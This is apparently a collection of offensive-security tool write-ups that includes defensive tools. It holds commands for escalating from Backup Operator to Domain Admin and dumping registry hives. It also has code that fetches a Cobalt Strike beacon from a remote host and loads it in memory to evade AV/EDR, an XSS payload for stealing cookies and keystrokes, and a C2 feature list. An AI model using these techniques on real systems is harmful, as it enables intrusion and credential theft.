    Wordlist that contains the paylaods can be added separatly or extracted from a given folder

    Single Wordlist with its attack type

    firefly -u 'http://example.com/?query=FUZZ' -w wordlist.txt:fuzz

    Extract all wordlists inside a folder. Attack type is depended on the suffix <type>_wordlist.txt

    firefly -u 'http://example.com/?query=FUZZ' -w wl/

    Example

    Wordlists names inside folder wl :

    1. fuzz_wordlist.txt
    2. time_wordlist.txt

    Output

    JSON output is strongly recommended. This is because you can benefit from the jq tool to navigate throw the result and compare it.

    (If Firefly is pipeline chained with other tools, standard plaintext may be a better choice.)

    Simple plaintext output format

    firefly -u 'http://example.com/?query=FUZZ' -o file.txt

    JSON output format (recommended)

    firefly -u 'http://example.com/?query=FUZZ' -oJ file.json

    Community

    Everyone in the community are allowed to suggest new features, improvements and/or add new payloads to Firefly just make a pull request or add a comment with your suggestions!



    BackupOperatorToolkit - The BackupOperatorToolkit Contains Different Techniques Allowing You To Escalate From Backup Operator To Domain Admin

    By: Zion3R


    The BackupOperatorToolkit contains different techniques allowing you to escalate from Backup Operator to Domain Admin.

    Usage

    The BackupOperatorToolkit (BOT) has 4 different mode that allows you to escalate from Backup Operator to Domain Admin.
    Use "runas.exe /netonly /user:domain.dk\backupoperator powershell.exe" before running the tool.


    Service Mode

    The SERVICE mode creates a service on the remote host that will be executed when the host is rebooted.
    The service is created by modyfing the remote registry. This is possible by passing the "REG_OPTION_BACKUP_RESTORE" value to RegOpenKeyExA and RegSetValueExA.
    It is not possible to have the service executed immediately as the service control manager database "SERVICES_ACTIVE_DATABASE" is loaded into memory at boot and can only be modified with local administrator privileges, which the Backup Operator does not have.

    .\BackupOperatorToolkit.exe SERVICE \\PATH\To\Service.exe \\TARGET.DOMAIN.DK SERVICENAME DISPLAYNAME DESCRIPTION

    DSRM Mode

    The DSRM mode will set the DsrmAdminLogonBehavior registry key found in "HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" to either 0, 1, or 2.
    Setting the value to 0 will only allow the DSRM account to be used when in recovery mode.
    Setting the value to 1 will allow the DSRM account to be used when the Directory Services service is stopped and the NTDS is unlocked.
    Setting the value to 2 will allow the DSRM account to be used with network authentication such as WinRM.
    If the DUMP mode has been used and the DSRM account has been cracked offline, set the value to 2 and log into the Domain Controller with the DSRM account which will be local administrator.

    .\BackupOperatorToolkit.exe DSRM \\TARGET.DOMAIN.DK 0||1||2

    DUMP Mode

    The DUMP mode will dump the SAM, SYSTEM, and SECURITY hives to a local path on the remote host or upload the files to a network share.
    Once the hives have been dumped you could PtH with the Domain Controller hash, crack DSRM and enable network auth, or possibly authenticate with another account found in the dumps. Accounts from other forests may be stored in these files, I'm not sure why but this has been observed on engagements with management forests. This mode is inspired by the BackupOperatorToDA project.

    .\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK

    IFEO Mode

    The IFEO (Image File Execution Options) will enable you to run an application when a specifc process is terminated.
    This could grant a shell before the SERVICE mode will in case the target host is heavily utilized and rarely rebooted.
    The executable will be running as a child to the WerFault.exe process.

    .\BackupOperatorToolkit.exe IFEO notepad.exe \\Path\To\pwn.exe \\TARGET.DOMAIN.DK






    PythonMemoryModule - Pure-Python Implementation Of MemoryModule Technique To Load Dll And Unmanaged Exe Entirely From Memory

    By: Zion3R


    "Python memory module" AI generated pic - hotpot.ai


    pure-python implementation of MemoryModule technique to load a dll or unmanaged exe entirely from memory

    What is it

    PythonMemoryModule is a Python ctypes porting of the MemoryModule technique originally published by Joachim Bauch. It can load a dll or unmanaged exe using Python without requiring the use of an external library (pyd). It leverages pefile to parse PE headers and ctypes.

    The tool was originally thought to be used as a Pyramid module to provide evasion against AV/EDR by loading dll/exe payloads in python.exe entirely from memory, however other use-cases are possible (IP protection, pyds in-memory loading, spinoffs for other stealthier techniques) so I decided to create a dedicated repo.


    Why it can be useful

    1. It basically allows to use the MemoryModule techinque entirely in Python interpreted language, enabling the loading of a dll from a memory buffer using the stock signed python.exe binary without requiring dropping on disk external code/libraries (such as pymemorymodule bindings) that can be flagged by AV/EDRs or can raise user's suspicion.
    2. Using MemoryModule technique in compiled languages loaders would require to embed MemoryModule code within the loaders themselves. This can be avoided using Python interpreted language and PythonMemoryModule since the code can be executed dynamically and in memory.
    3. you can get some level of Intellectual Property protection by dynamically in-memory downloading, decrypting and loading dlls that should be hidden from prying eyes. Bear in mind that the dlls can be still recovered from memory and reverse-engineered, but at least it would require some more effort by the attacker.
    4. you can load a stageless payload dll without performing injection or shellcode execution. The loading process mimics the LoadLibrary Windows API (which takes a path on disk as input) without actually calling it and operating in memory.

    How to use it

    In the following example a Cobalt Strike stageless beacon dll is downloaded (not saved on disk), loaded in memory and started by calling the entrypoint.

    import urllib.request
    import ctypes
    import pythonmemorymodule
    request = urllib.request.Request('http://192.168.1.2/beacon.dll')
    result = urllib.request.urlopen(request)
    buf=result.read()
    dll = pythonmemorymodule.MemoryModule(data=buf, debug=True)
    startDll = dll.get_proc_addr('StartW')
    assert startDll()
    #dll.free_library()

    Note: if you use staging in your malleable profile the dll would not be able to load with LoadLibrary, hence MemoryModule won't work.

    How to detect it

    Using the MemoryModule technique will mostly respect the sections' permissions of the target DLL and avoid the noisy RWX approach. However within the program memory there will be a private commit not backed by a dll on disk and this is a MemoryModule telltale.

    Future improvements

    1. add support for argument parsing.
    2. add support (basic) for .NET assemblies execution.


    XSS-Exploitation-Tool - An XSS Exploitation Tool

    By: Zion3R


    XSS Exploitation Tool is a penetration testing tool that focuses on the exploit of Cross-Site Scripting vulnerabilities.

    This tool is only for educational purpose, do not use it against real environment


    Features

    • Technical Data about victim browser
    • Geolocation of the victim
    • Snapshot of the hooked/visited page
    • Source code of the hooked/visited page
    • Exfiltrate input field data
    • Exfiltrate cookies
    • Keylogging
    • Display alert box
    • Redirect user

    Installation

    Tested on Debian 11

    You may need Apache, Mysql database and PHP with modules:

    $ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
    $ sudo rm /var/www/index.html

    Install Git and pull the XSS-Exploitation-Tool source code:

    $ sudo apt-get install git

    $ cd /tmp
    $ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
    $ sudo mv XSS-Exploitation-Tool/* /var/www/html/

    Install composer, then install the application dependencies:

    $ sudo apt-get install composer
    $ cd /var/www/html/
    $ sudo chown -R $your_debian_user:$your_debian_user /var/www/
    $ composer install
    $ sudo chown -R www-data:$www-data /var/www/

    Init the database

    $ sudo mysql

    Creating a new user with specific rights:

    MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
    Query OK, 0 rows affected (0.00 sec)

    MariaDB [(none)]> flush privileges;
    Query OK, 0 rows affected (0.00 sec)

    MariaDB [(none)]> quit
    Bye

    Creating the database (will result in an empty page):

    Visit the page http://server-ip/reset_database.php

    Adapt the javascript hook file

    The file hook.js is a hook. You need to replace the ip address in the first line with the XSS Exploitation Tool server ip address:

    var address = "your server ip";

    How it works

    First, create a page (or exploit a Cross-Site Scripting vulnerability) to insert the Javascript hook file (see exploit.html at the root dir):

    ?vulnerable_param=<script src="http://your_server_ip/hook.js"/>

    Then, when victims visit the hooked page, the XSS Exploitation Tool server should list the hooked browsers:

    Screenshots



    Jsfinder - Fetches JavaScript Files Quickly And Comprehensively

    By: Zion3R


    jsFinder is a command-line tool written in Go that scans web pages to find JavaScript files linked in the HTML source code. It searches for any attribute that can contain a JavaScript file (e.g., src, href, data-main, etc.) and extracts the URLs of the files to a text file. The tool is designed to be simple to use, and it supports reading URLs from a file or from standard input.

    jsFinder is useful for web developers and security professionals who want to find and analyze the JavaScript files used by a web application. By analyzing the JavaScript files, it's possible to understand the functionality of the application and detect any security vulnerabilities or sensitive information leakage.


    Features

    • Reading URLs from a file or from stdin using command line arguments.
    • Running multiple HTTP GET requests concurrently to each URL.
    • Limiting the concurrency of HTTP GET requests using a flag.
    • Using a regular expression to search for JavaScript files in the response body of the HTTP GET requests.
    • Writing the found JavaScript files to a file specified in the command line arguments or to a default file named "output.txt".
    • Printing informative messages to the console indicating the status of the program's execution and the output file's location.
    • Allowing the program to run in verbose or silent mode using a flag.

    Installation

    jsfinder requires Go 1.20 to install successfully.Run the following command to get the repo :

    go install -v github.com/kacakb/jsfinder@latest

    Usage

    To see which flags you can use with the tool, use the -h flag.

    jsfinder -h 
    Flag Description
    -l Specifies the filename to read URLs from.
    -c Specifies the maximum number of concurrent requests to be made. The default value is 20.
    -s Runs the program in silent mode. If this flag is not set, the program runs in verbose mode.
    -o Specifies the filename to write found URLs to. The default filename is output.txt.
    -read Reads URLs from stdin instead of a file specified by the -l flag.

    Demo

    I

    Fetches JavaScript files quickly and comprehensively. (6)

    If you want to read from stdin and run the program in silent mode, use this command:

    cat list.txt| jsfinder -read -s -o js.txt

     

    II

    Fetches JavaScript files quickly and comprehensively. (7)

    If you want to read from a file, you should specify it with the -l flag and use this command:

    jsfinder -l list.txt -s -o js.txt

    You can also specify the concurrency with the -c flag.The default value is 20. If you want to read from a file, you should specify it with the -l flag and use this command:

    jsfinder -l list.txt -c 50 -s -o js.txt

    TODOs

    • Adding new features
    • Improving performance
    • Adding a cookie flag
    • Reading regex from a file
    • Integrating the kacak tool (coming soon)

    Screenshot

    Contact

    If you have any questions, feedback or collaboration suggestions related to this project, please feel free to contact me via:

    e-mail

    Dumpulator - An Easy-To-Use Library For Emulating Memory Dumps. Useful For Malware Analysis (Config Extraction, Unpacking) And Dynamic Analysis In General (Sandboxing)

    By: Zion3R


    Note: This is a work-in-progress prototype, please treat it as such. Pull requests are welcome! You can get your feet wet with good first issues

    An easy-to-use library for emulating code in minidump files. Here are some links to posts/videos using dumpulator:


    Examples

    Calling a function

    The example below opens StringEncryptionFun_x64.dmp (download a copy here), allocates some memory and calls the decryption function at 0x140001000 to decrypt the string at 0x140017000:

    from dumpulator import Dumpulator

    dp = Dumpulator("StringEncryptionFun_x64.dmp")
    temp_addr = dp.allocate(256)
    dp.call(0x140001000, [temp_addr, 0x140017000])
    decrypted = dp.read_str(temp_addr)
    print(f"decrypted: '{decrypted}'")

    The StringEncryptionFun_x64.dmp is collected at the entry point of the tests/StringEncryptionFun example. You can get the compiled binaries for StringEncryptionFun here

    Tracing execution

    from dumpulator import Dumpulator

    dp = Dumpulator("StringEncryptionFun_x64.dmp", trace=True)
    dp.start(dp.regs.rip)

    This will create StringEncryptionFun_x64.dmp.trace with a list of instructions executed and some helpful indications when switching modules etc. Note that tracing significantly slows down emulation and it's mostly meant for debugging.

    Reading utf-16 strings

    from dumpulator import Dumpulator

    dp = Dumpulator("my.dmp")
    buf = dp.call(0x140001000)
    dp.read_str(buf, encoding='utf-16')

    Running a snippet of code

    Say you have the following function:

    00007FFFC81C06C0 | mov qword ptr [rsp+0x10],rbx       ; prolog_start
    00007FFFC81C06C5 | mov qword ptr [rsp+0x18],rsi
    00007FFFC81C06CA | push rbp
    00007FFFC81C06CB | push rdi
    00007FFFC81C06CC | push r14
    00007FFFC81C06CE | lea rbp,qword ptr [rsp-0x100]
    00007FFFC81C06D6 | sub rsp,0x200 ; prolog_end
    00007FFFC81C06DD | mov rax,qword ptr [0x7FFFC8272510]

    You only want to execute the prolog and set up some registers:

    from dumpulator import Dumpulator

    prolog_start = 0x00007FFFC81C06C0
    # we want to stop the instruction after the prolog
    prolog_end = 0x00007FFFC81C06D6 + 7

    dp = Dumpulator("my.dmp", quiet=True)
    dp.regs.rcx = 0x1337
    dp.start(start=prolog_start, end=prolog_end)
    print(f"rsp: {hex(dp.regs.rsp)}")

    The quiet flag suppresses the logs about DLLs loaded and memory regions set up (for use in scripts where you want to reduce log spam).

    Custom syscall implementation

    You can (re)implement syscalls by using the @syscall decorator:

    from dumpulator import *
    from dumpulator.native import *
    from dumpulator.handles import *
    from dumpulator.memory import *

    @syscall
    def ZwQueryVolumeInformationFile(dp: Dumpulator,
    FileHandle: HANDLE,
    IoStatusBlock: P[IO_STATUS_BLOCK],
    FsInformation: PVOID,
    Length: ULONG,
    FsInformationClass: FSINFOCLASS
    ):
    return STATUS_NOT_IMPLEMENTED

    All the syscall function prototypes can be found in ntsyscalls.py. There are also a lot of examples there on how to use the API.

    To hook an existing syscall implementation you can do the following:

    import dumpulator.ntsyscalls as ntsyscalls

    @syscall
    def ZwOpenProcess(dp: Dumpulator,
    ProcessHandle: Annotated[P[HANDLE], SAL("_Out_")],
    DesiredAccess: Annotated[ACCESS_MASK, SAL("_In_")],
    ObjectAttributes: Annotated[P[OBJECT_ATTRIBUTES], SAL("_In_")],
    ClientId: Annotated[P[CLIENT_ID], SAL("_In_opt_")]
    ):
    process_id = ClientId.read_ptr()
    assert process_id == dp.parent_process_id
    ProcessHandle.write_ptr(0x1337)
    return STATUS_SUCCESS

    @syscall
    def ZwQueryInformationProcess(dp: Dumpulator,
    ProcessHandle: Annotated[HANDLE, SAL("_In_")],
    ProcessInformationClass: Annotated[PROCESSINFOCLASS, SAL("_In_")],
    ProcessInformation: Annotated[PVOID, SAL("_Out_wri tes_bytes_(ProcessInformationLength)")],
    ProcessInformationLength: Annotated[ULONG, SAL("_In_")],
    ReturnLength: Annotated[P[ULONG], SAL("_Out_opt_")]
    ):
    if ProcessInformationClass == PROCESSINFOCLASS.ProcessImageFileNameWin32:
    if ProcessHandle == dp.NtCurrentProcess():
    main_module = dp.modules[dp.modules.main]
    image_path = main_module.path
    elif ProcessHandle == 0x1337:
    image_path = R"C:\Windows\explorer.exe"
    else:
    raise NotImplementedError()
    buffer = UNICODE_STRING.create_buffer(image_path, ProcessInformation)
    assert ProcessInformationLength >= len(buffer)
    if ReturnLength.ptr:
    dp.write_ulong(ReturnLength.ptr, len(buffer))
    ProcessInformation.write(buffer)
    return STATUS_SUCCESS
    return ntsyscal ls.ZwQueryInformationProcess(dp,
    ProcessHandle,
    ProcessInformationClass,
    ProcessInformation,
    ProcessInformationLength,
    ReturnLength
    )

    Custom structures

    Since v0.2.0 there is support for easily declaring your own structures:

    from dumpulator.native import *

    class PROCESS_BASIC_INFORMATION(Struct):
    ExitStatus: ULONG
    PebBaseAddress: PVOID
    AffinityMask: KAFFINITY
    BasePriority: KPRIORITY
    UniqueProcessId: ULONG_PTR
    InheritedFromUniqueProcessId: ULONG_PTR

    To instantiate these structures you have to use a Dumpulator instance:

    pbi = PROCESS_BASIC_INFORMATION(dp)
    assert ProcessInformationLength == Struct.sizeof(pbi)
    pbi.ExitStatus = 259 # STILL_ACTIVE
    pbi.PebBaseAddress = dp.peb
    pbi.AffinityMask = 0xFFFF
    pbi.BasePriority = 8
    pbi.UniqueProcessId = dp.process_id
    pbi.InheritedFromUniqueProcessId = dp.parent_process_id
    ProcessInformation.write(bytes(pbi))
    if ReturnLength.ptr:
    dp.write_ulong(ReturnLength.ptr, Struct.sizeof(pbi))
    return STATUS_SUCCESS

    If you pass a pointer value as a second argument the structure will be read from memory. You can declare pointers with myptr: P[MY_STRUCT] and dereferences them with myptr[0].

    Collecting the dump

    There is a simple x64dbg plugin available called MiniDumpPlugin The minidump command has been integrated into x64dbg since 2022-10-10. To create a dump, pause execution and execute the command MiniDump my.dmp.

    Installation

    From PyPI (latest release):

    python -m pip install dumpulator

    To install from source:

    python setup.py install

    Install for a development environment:

    python setup.py develop

    Related work

    • Dumpulator-IDA: This project is a small POC plugin for launching dumpulator emulation within IDA, passing it addresses from your IDA view using the context menu.
    • wtf: Distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and / or kernel-mode targets running on Microsoft Windows
    • speakeasy: Windows sandbox on top of unicorn.
    • qiling: Binary emulation framework on top of unicorn.
    • Simpleator: User-mode application emulator based on the Hyper-V Platform API.

    What sets dumpulator apart from sandboxes like speakeasy and qiling is that the full process memory is available. This improves performance because you can emulate large parts of malware without ever leaving unicorn. Additionally only syscalls have to be emulated to provide a realistic Windows environment (since everything actually is a legitimate process environment).

    Credits



    Wafaray - Enhance Your Malware Detection With WAF + YARA (WAFARAY)

    By: Zion3R

    WAFARAY is a LAB deployment based on Debian 11.3.0 (stable) x64 made and cooked between two main ingredients WAF + YARA to detect malicious files (e.g. webshells, virus, malware, binaries) typically through web functions (upload files).


    Purpose

    In essence, the main idea came to use WAF + YARA (YARA right-to-left = ARAY) to detect malicious files at the WAF level before WAF can forward them to the backend e.g. files uploaded through web functions see: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

    When a web page allows uploading files, most of the WAFs are not inspecting files before sending them to the backend. Implementing WAF + YARA could provide malware detection before WAF forwards the files to the backend.

    Do malware detection through WAF?

    Yes, one solution is to use ModSecurity + Clamav, most of the pages call ClamAV as a process and not as a daemon, in this case, analysing a file could take more than 50 seconds per file. See this resource: https://kifarunix.com/intercept-malicious-file-upload-with-modsecurity-and-clamav/

    Do malware detection through WAF + YARA?

    :-( A few clues here Black Hat Asia 2019 please continue reading and see below our quick LAB deployment.

    WAFARAY: how does it work ?

    Basically, It is a quick deployment (1) with pre-compiled and ready-to-use YARA rules via ModSecurity (WAF) using a custom rule; (2) this custom rule will perform an inspection and detection of the files that might contain malicious code, (3) typically web functions (upload files) if the file is suspicious will reject them receiving a 403 code Forbidden by ModSecurity.

    ✔️The YaraCompile.py compiles all the yara rules. (Python3 code)
    ✔️The test.conf is a virtual host that contains the mod security rules. (ModSecurity Code)
    ✔️ModSecurity rules calls the modsec_yara.py in order to inspect the file that is trying to upload. (Python3 code)
    ✔️Yara returns two options 1 (200 OK) or 0 (403 Forbidden)

    Main Paths:

    • Yara Compiled rules: /YaraRules/Compiled
    • Yara Default rules: /YaraRules/rules
    • Yara Scripts: /YaraRules/YaraScripts
    • Apache vhosts: /etc/apache2/sites-enabled
    • Temporal Files: /temporal

    Approach

    • Blueteamers: Rule enforcement, best alerting, malware detection on files uploaded through web functions.
    • Redteamers/pentesters: GreyBox scope , upload and bypass with a malicious file, rule enforcement.
    • Security Officers: Keep alerting, threat hunting.
    • SOC: Best monitoring about malicious files.
    • CERT: Malware Analysis, Determine new IOC.

    Building Detection Lab

    The Proof of Concept is based on Debian 11.3.0 (stable) x64 OS system, OWASP CRC v3.3.2 and Yara 4.0.5, you will find the automatic installation script here wafaray_install.sh and an optional manual installation guide can be found here: manual_instructions.txt also a PHP page has been created as a "mock" to observe the interaction and detection of malicious files using WAF + YARA.

    Installation (recommended) with shell scripts

    ✔️Step 2: Deploy using VMware or VirtualBox
    ✔️Step 3: Once installed, please follow the instructions below:
    alex@waf-labs:~$ su root 
    root@waf-labs:/home/alex#

    # Remember to change YOUR_USER by your username (e.g waf)
    root@waf-labs:/home/alex# sed -i 's/^\(# User privi.*\)/\1\nalex ALL=(ALL) NOPASSWD:ALL/g' /etc/sudoers
    root@waf-labs:/home/alex# exit
    alex@waf-labs:~$ sudo sed -i 's/^\(deb cdrom.*\)/#\1/g' /etc/apt/sources.list
    alex@waf-labs:~$ sudo sed -i 's/^# \(deb\-src http.*\)/ \1/g' /etc/apt/sources.list
    alex@waf-labs:~$ sudo sed -i 's/^# \(deb http.*\)/ \1/g' /etc/apt/sources.list
    alex@waf-labs:~$ echo -ne "\n\ndeb http://deb.debian.org/debian/ bullseye main\ndeb-src http://deb.debian.org/debian/ bullseye main\n" | sudo tee -a /etc/apt/sources.list
    alex@waf-labs:~$ sudo apt-get update
    alex@waf-labs:~$ sudo apt-get install sudo -y
    alex@waf-labs:~$ sudo apt-get install git vim dos2unix net-tools -y
    alex@waf-labs:~$ git clone https://github.com/alt3kx/wafarayalex@waf-labs:~$ cd wafaray
    alex@waf-labs:~$ dos2unix wafaray_install.sh
    alex@waf-labs:~$ chmod +x wafaray_install.sh
    alex@waf-labs:~$ sudo ./wafaray_install.sh >> log_install.log

    # Test your LAB environment
    alex@waf-labs:~$ firefox localhost:8080/upload.php

    Yara Rules

    Once the Yara Rules were downloaded and compiled.

    It is similar to when you deploy ModSecurity, you need to customize what kind of rule you need to apply. The following log is an example of when the Web Application Firewall + Yara detected a malicious file, in this case, eicar was detected.

    Message: Access denied with code 403 (phase 2). File "/temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA" rejected by 
    the approver script "/YaraRules/YaraScripts/modsec_yara.py": 0 SUSPECTED [YaraSignature: eicar]
    [file "/etc/apache2/sites-enabled/test.conf"] [line "56"] [id "500002"]
    [msg "Suspected File Upload:eicar.com.txt -> /temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA - URI: /upload.php"]

    Testing WAFARAY... voilà...

    Stop / Start ModSecurity

    $ sudo service apache2 stop
    $ sudo service apache2 start

    Apache Logs

    $ cd /var/log
    $ sudo tail -f apache2/test_access.log apache2/test_audit.log apache2/test_error.log

    Demos

    Be careful about your test. The following demos were tested on isolated virtual machines.

    Demo 1 - EICAR

    A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of Malware: https://secure.eicar.org/eicar.com.txt) NOT EXECUTE THE FILE.

    Demo 2 - WebShell.php

    For this demo, we disable the rule 933110 - PHP Inject Attack to validate Yara Rules. A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of WebShell PHP: https://github.com/drag0s/php-webshell) NOT EXECUTE THE FILE.

    Demo 3 - Malware Bazaar (RecordBreaker) Published: 2022-08-13

    A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of Malware Bazaar (RecordBreaker): https://bazaar.abuse.ch/sample/94ffc1624939c5eaa4ed32d19f82c369333b45afbbd9d053fa82fe8f05d91ac2/) NOT EXECUTE THE FILE.

    YARA Rules sources

    In case that you want to download more yara rules, you can see the following repositories:

    References

    Roadmap until next release

    • Malware Hash Database (MLDBM). The Database stores the MD5 or SHA1 that files were detected as suspicious.
    • To be tested CRS Modsecurity v.3.3.3 new rules
    • ModSecurity rules improvement to malware detection with Database.
    • To be created blacklist and whitelist related to MD5 or SHA1.
    • To be tested, run in background if the Yara analysis takes more than 3 seconds.
    • To be tested, new payloads, example: Powershell Obfuscasted (WebShells)
    • Remarks for live enviroments. (WAF AWS, WAF GCP, ...)

    Authors

    Alex Hernandez aka (@_alt3kx_)
    Jesus Huerta aka @mindhack03d

    Contributors

    Israel Zeron Medina aka @spk085



    PassMute - PassMute - A Multi Featured Password Transmutation/Mutator Tool

    By: Zion3R


    This is a command-line tool written in Python that applies one or more transmutation rules to a given password or a list of passwords read from one or more files. The tool can be used to generate transformed passwords for security testing or research purposes. Also, while you doing pentesting it will be very useful tool for you to brute force the passwords!!


    How Passmute can also help to secure our passwords more?

    PassMute can help to generate strong and complex passwords by applying different transformation rules to the input password. However, password security also depends on other factors such as the length of the password, randomness, and avoiding common phrases or patterns.

    The transformation rules include:

    reverse: reverses the password string

    uppercase: converts the password to uppercase letters

    lowercase: converts the password to lowercase letters

    swapcase: swaps the case of each letter in the password

    capitalize: capitalizes the first letter of the password

    leet: replaces some letters in the password with their leet equivalents

    strip: removes all whitespace characters from the password

    The tool can also write the transformed passwords to an output file and run the transformation process in parallel using multiple threads.

    Installation

    git clone https://HITH-Hackerinthehouse/PassMute.git
    cd PassMute
    chmod +x PassMute.py

    Usage To use the tool, you need to have Python 3 installed on your system. Then, you can run the tool from the command line using the following options:

    python PassMute.py [-h] [-f FILE [FILE ...]] -r RULES [RULES ...] [-v] [-p PASSWORD] [-o OUTPUT] [-t THREAD_TIMEOUT] [--max-threads MAX_THREADS]

    Here's a brief explanation of the available options:

    -h or --help: shows the help message and exits

    -f (FILE) [FILE ...], --file (FILE) [FILE ...]: one or more files to read passwords from

    -r (RULES) [RULES ...] or --rules (RULES) [RULES ...]: one or more transformation rules to apply

    -v or --verbose: prints verbose output for each password transformation

    -p (PASSWORD) or --password (PASSWORD): transforms a single password

    -o (OUTPUT) or --output (OUTPUT): output file to save the transformed passwords

    -t (THREAD_TIMEOUT) or --thread-timeout (THREAD_TIMEOUT): timeout for threads to complete (in seconds)

    --max-threads (MAX_THREADS): maximum number of threads to run simultaneously (default: 10)

    NOTE: If you are getting any error regarding argparse module then simply install the module by following command: pip install argparse

    Examples

    Here are some example commands those read passwords from a file, applies two transformation rules, and saves the transformed passwords to an output file:

    Single Password transmutation: python PassMute.py -p HITHHack3r -r leet reverse swapcase -v -t 50

    Multiple Password transmutation: python PassMute.py -f testwordlists.txt -r leet reverse -v -t 100 -o testupdatelists.txt

    Here Verbose and Thread are recommended to use in case you're transmutating big files and also it depends upon your microprocessor as well, it's not required every time to use threads and verbose mode.

    Legal Disclaimer:

    You might be super excited to use this tool, we too. But here we need to confirm! Hackerinthehouse, any contributor of this project and Github won't be responsible for any actions made by you. This tool is made for security research and educational purposes only. It is the end user's responsibility to obey all applicable local, state and federal laws.



    SpiderSuite - Advance Web Spider/Crawler For Cyber Security Professionals

    By: Zion3R


    An advance cross-platform and multi-feature GUI web spider/crawler for cyber security proffesionals. Spider Suite can be used for attack surface mapping and analysis. For more information visit SpiderSuite's website.


    Installation and Usage

    Spider Suite is designed for easy installation and usage even for first timers.

    • First, download the package of your choice.

    • Then install the downloaded SpiderSuite package.

    • See First time crawling with SpiderSuite article for tutorial on how to get started.

    For complete documentation of Spider Suite see wiki.

    Contributing

    Can you translate?

    Visit SpiderSuite's translation project to make translations to your native language.

    Not a developer?

    You can help by reporting bugs, requesting new features, improving the documentation, sponsoring the project & writing articles.

    For More information see contribution guide.

    Contributers

    Credits

    This product includes software developed by the following open source projects:



    Domain-Protect - OWASP Domain Protect - Prevent Subdomain Takeover

    By: Zion3R

    OWASP Global AppSec Dublin - talk and demo


    Features

    • scan Amazon Route53 across an AWS Organization for domain records vulnerable to takeover
    • scan Cloudflare for vulnerable DNS records
    • take over vulnerable subdomains yourself before attackers and bug bounty researchers
    • automatically create known issues in Bugcrowd or HackerOne
    • vulnerable domains in Google Cloud DNS can be detected by Domain Protect for GCP
    • manual scans of cloud accounts with no installation

    Installation

    Collaboration

    We welcome collaborators! Please see the OWASP Domain Protect website for more details.

    Documentation

    Manual scans - AWS
    Manual scans - CloudFlare
    Architecture
    Database
    Reports
    Automated takeover optional feature
    Cloudflare optional feature
    Bugcrowd optional feature
    HackerOne optional feature
    Vulnerability types
    Vulnerable A records (IP addresses) optional feature
    Requirements
    Installation
    Slack Webhooks
    AWS IAM policies
    CI/CD
    Development
    Code Standards
    Automated Tests
    Manual Tests
    Conference Talks and Blog Posts

    Limitations

    This tool cannot guarantee 100% protection against subdomain takeovers.



    Nimbo-C2 - Yet Another (Simple And Lightweight) C2 Framework

    By: Zion3R

    About

    Nimbo-C2 is yet another (simple and lightweight) C2 framework.

    Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some usage of .NET on Windows (by dynamically loading the CLR to the process). Nim is powerful, but interacting with Windows is much easier and robust using Powershell, hence this combination is made. The Linux agent is slimer and capable only of basic commands, including ELF loading using the memfd technique.

    All server components are written in Python:

    • HTTP listener that manages the agents.
    • Builder that generates the agent payloads.
    • Nimbo-C2 is the interactive C2 component that rule'em all!

    My work wouldn't be possible without the previous great work done by others, listed under credits.


    Features

    • Build EXE, DLL, ELF payloads.
    • Encrypted implant configuration and strings using NimProtect.
    • Packing payloads using UPX and obfuscate the PE section names (UPX0, UPX1) to make detection and unpacking harder.
    • Encrypted HTTP communication (AES in CBC mode, key hardcoded in the agent and configurable by the config.jsonc).
    • Auto-completion in the C2 Console for convenient interaction.
    • In-memory Powershell commands execution.
    • File download and upload commands.
    • Built-in discovery commands.
    • Screenshot taking, clipboard stealing, audio recording.
    • Memory evasion techniques like NTDLL unhooking, ETW & AMSI patching.
    • LSASS and SAM hives dumping.
    • Shellcode injection.
    • Inline .NET assemblies execution.
    • Persistence capabilities.
    • UAC bypass methods.
    • ELF loading using memfd in 2 modes.
    • And more !

    Installation

    Easy Way

    1. Clone the repository and cd in
    git clone https://github.com/itaymigdal/Nimbo-C2
    cd Nimbo-C2
    1. Build the docker image
    docker build -t nimbo-dependencies .
    1. cd again into the source files and run the docker image interactively, expose port 80 and mount Nimbo-C2 directory to the container (so you can easily access all project files, modify config.jsonc, download and upload files from agents, etc.). For Linux replace ${pwd} with $(pwd).
    cd Nimbo-C2
    docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 nimbo-dependencies

    Easier Way

    git clone https://github.com/itaymigdal/Nimbo-C2
    cd Nimbo-C2/Nimbo-C2
    docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 itaymigdal/nimbo-dependencies

    Usage

    First, edit config.jsonc for your needs.

    Then run with: python3 Nimbo-C2.py

    Use the help command for each screen, and tab completion.

    Also, check the examples directory.

    Main Window

    Nimbo-C2 > help

    --== Agent ==--
    agent list -> list active agents
    agent interact <agent-id> -> interact with the agent
    agent remove <agent-id> -> remove agent data

    --== Builder ==--
    build exe -> build exe agent (-h for help)
    build dll -> build dll agent (-h for help)
    build elf -> build elf agent (-h for help)

    --== Listener ==--
    listener start -> start the listener
    listener stop -> stop the listener
    listener status -> print the listener status

    --== General ==--
    cls -> clear the screen
    help -> print this help message
    exit -> exit Nimbo-C2
    </ div>

    Agent Window

    Windows agent

    Nimbo-2 [d337c406] > help

    --== Send Commands ==--
    cmd <shell-command> -> execute a shell command
    iex <powershell-scriptblock> -> execute in-memory powershell command

    --== File Stuff ==--
    download <remote-file> -> download a file from the agent (wrap path with quotes)
    upload <loal-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

    --== Discovery Stuff ==--
    pstree -> show process tree
    checksec -> check for security products
    software -> check for installed software

    --== Collection Stuff ==--
    clipboard -> retrieve clipboard
    screenshot -> retrieve screenshot
    audio <record-time> -> record audio

    --== Post Exploitation Stuff ==--
